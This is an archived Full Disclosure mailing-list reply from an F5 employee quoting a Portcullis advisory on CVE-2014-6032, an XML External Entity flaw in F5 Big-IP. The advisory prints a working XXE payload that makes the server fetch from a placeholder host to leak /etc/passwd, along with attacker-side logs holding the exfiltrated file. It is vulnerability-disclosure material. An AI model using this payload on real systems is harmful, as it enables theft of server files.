[<prev] [next>] [day] [month] [year] [list]
Message-ID: <D077A4DD.111E30%j.costlow@f5.com>
Date: Thu, 30 Oct 2014 15:23:12 +0000
From: Jeff Costlow <j.costlow@...com>
To: "'fulldisclosure@...lists.org'" <fulldisclosure@...lists.org>
Subject: Re: [FD] CVE-2014-6032 - XML External Entity Injection in F5
Networks Big-IP
Thanks to Oliver for reporting these to F5.
https://support.f5.com/kb/en-us/solutions/public/15000/600/sol15605.html
On 10/30/14, 3:22 AM, "Portcullis Advisories"
<advisories@...tcullis-security.com> wrote:
>Vulnerability title: XML External Entity Injection in F5 Networks Big-IP
>CVE: CVE-2014-6032
>Vendor: F5 Networks
>Product: Big-IP
>Affected version: 11.3.0.39.0
>Fixed version: N/A
>Reported by: Oliver Gruskovnjak
>
>Details:
>
>F5 Networks Big-IP is vulnerable to an XML External Entity injection
>attack. The following xml payload was used to trigger the XXE (The
>vulnerable URL is redacted due to the number of affected systems):
>
><?xml version="1.0" encoding="utf-8"?>
><!DOCTYPE root [
><!ENTITY % remote SYSTEM "http://x.x.x.x/xml?f=/etc/passwd"> %remote;
>%int;
>%trick;]>
><deal type="request" id="1"><card type="query" id="1"/></deal>
>
>
>On the attacking Server the file can be read from web server logs:
>
>
>10.1.10.10 - - [20/Aug/2014:00:17:44 PDT] "GET /xml?f=/etc/passwd
>HTTP/1.1" 200 128
>- -> /xml?f=/etc/passwd
>10.1.10.10 - - [20/Aug/2014 00:17:44] "GET
>/?p=root:x:0:0:root:/root:/bin/bash%0Abin:x:1:1:bin:/bin:/sbin/nologin%0Ad
>aemon:x:2:2:daemon:/sbin:/sbin/nologin%0Aadm:x:3:4:adm:/var/adm:/sbin/nolo
>gin%0Alp:x:4:7:lp:/var/spool/lpd:/sbin/nologin%0Amail:x:8:12:mail:/var/spo
>ol/mail:/sbin/nologin%0Auucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin%0A
>operator:x:11:0:operator:/root:/sbin/nologin%0Anobody:x:99:99:Nobody:/:/sb
>in/nologin%0Atmshnobody:x:32765:32765:tmshnobody:/:/sbin/nologin%0Aadmin:x
>:0:500:Admin%20User:/home/admin:/bin/false%0Aapache:x:48:48:Apache:/usr/lo
>cal/www:/bin/bash%0Amysql:x:98:98:MySQL%20server:/var/lib/mysql:/sbin/nolo
>gin%0Avcsa:x:69:69:virtual%20console%20memory%20owner:/dev:/sbin/nologin%0
>Aoprofile:x:16:16:Special%20user%20account%20to%20be%20used%20by%20OProfil
>e:/:/sbin/nologin%0Asshd:x:74:74:Privilege-separated%20SSH:/var/empty/sshd
>:/sbin/nologin%0Asyscheck:x:976:10::/:/sbin/nologin%0Arpc:x:32:32:Portmapp
>er%20RPC%20user:/:/sbin/nologin%0Af5_remoteuser:x:499:499:f
>
>5%20remote%20user%20account:/home/f5_remoteuser:/sbin/nologin%0Apcap:x:77:
>77::/var/arpwatch:/sbin/nologin%0Atomcat:x:91:91:Apache%20Tomcat:/usr/shar
>e/tomcat:/sbin/nologin%0Antp:x:38:38::/etc/ntp:/sbin/nologin%0Anamed:x:25:
>25:Named:/var/named:/bin/false%0A HTTP/1.1" 200 - 0.0013
>
>
>
>Further details at:
>
>https://www.portcullis-security.com/security-research-and-downloads/securi
>ty-advisories/cve-2014-6032/
>
>Copyright:
>Copyright (c) Portcullis Computer Security Limited 2014, All rights
>reserved worldwide. Permission is hereby granted for the electronic
>redistribution of this information. It is not to be edited or altered in
>any way without the express written consent of Portcullis Computer
>Security Limited.
>
>Disclaimer:
>The information herein contained may change without notice. Use of this
>information constitutes acceptance for use in an AS IS condition. There
>are NO warranties, implied or otherwise, with regard to this information
>or its use. Any use of this information is at the user's risk. In no
>event shall the author/distributor (Portcullis Computer Security Limited)
>be held liable for any damages whatsoever arising out of or in connection
>with the use or spread of this information.
>
>
>###############################################################
>This email originates from the systems of Portcullis
>Computer Security Limited, a Private limited company,
>registered in England in accordance with the Companies
>Act under number 02763799. The registered office
>address of Portcullis Computer Security Limited is:
>Portcullis House, 2 Century Court, Tolpits Lane, Watford,
>United Kingdom, WD18 9RS.
>The information in this email is confidential and may be
>legally privileged. It is intended solely for the addressee.
>Any opinions expressed are those of the individual and
>do not represent the opinion of the organisation. Access
>to this email by persons other than the intended recipient
>is strictly prohibited.
>If you are not the intended recipient, any disclosure,
>copying, distribution or other action taken or omitted to be
>taken in reliance on it, is prohibited and may be unlawful.
>When addressed to our clients any opinions or advice
>contained in this email is subject to the terms and
>conditions expressed in the applicable Portcullis Computer
>Security Limited terms of business.
>###############################################################
>
>##########################################################################
>###########
>This e-mail message has been scanned for Viruses and Content and cleared
>by MailMarshal.
>##########################################################################
>###########
>
>_______________________________________________
>Sent through the Full Disclosure mailing list
>http://nmap.org/mailman/listinfo/fulldisclosure
>Web Archives & RSS: http://seclists.org/fulldisclosure/
_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists